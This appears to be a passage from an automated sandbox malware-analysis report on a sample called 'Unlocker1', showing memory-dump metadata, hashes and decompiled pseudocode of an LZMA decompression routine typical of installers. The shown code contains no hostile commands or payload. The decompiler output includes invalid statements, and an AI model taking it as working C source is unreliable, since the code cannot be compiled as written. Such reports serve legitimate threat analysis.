                                                                                                                                                              0x0040633f
                                                                                                                                                              0x00406340
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406356
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406710
                                                                                                                                                              0x004066d9

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                                                                                                                                              • Instruction ID: 95af8839098f806f541805b71f16133a603fad5641f47eebb8f014e75b9041d1
                                                                                                                                                              • Opcode Fuzzy Hash: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                                                                                                                                              • Instruction Fuzzy Hash: 58A13371D00229CBDF28CFA8C8447ADBBB1FF44305F25856AD856BB281D7789A86DF44
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004065DE Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E004065DE() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
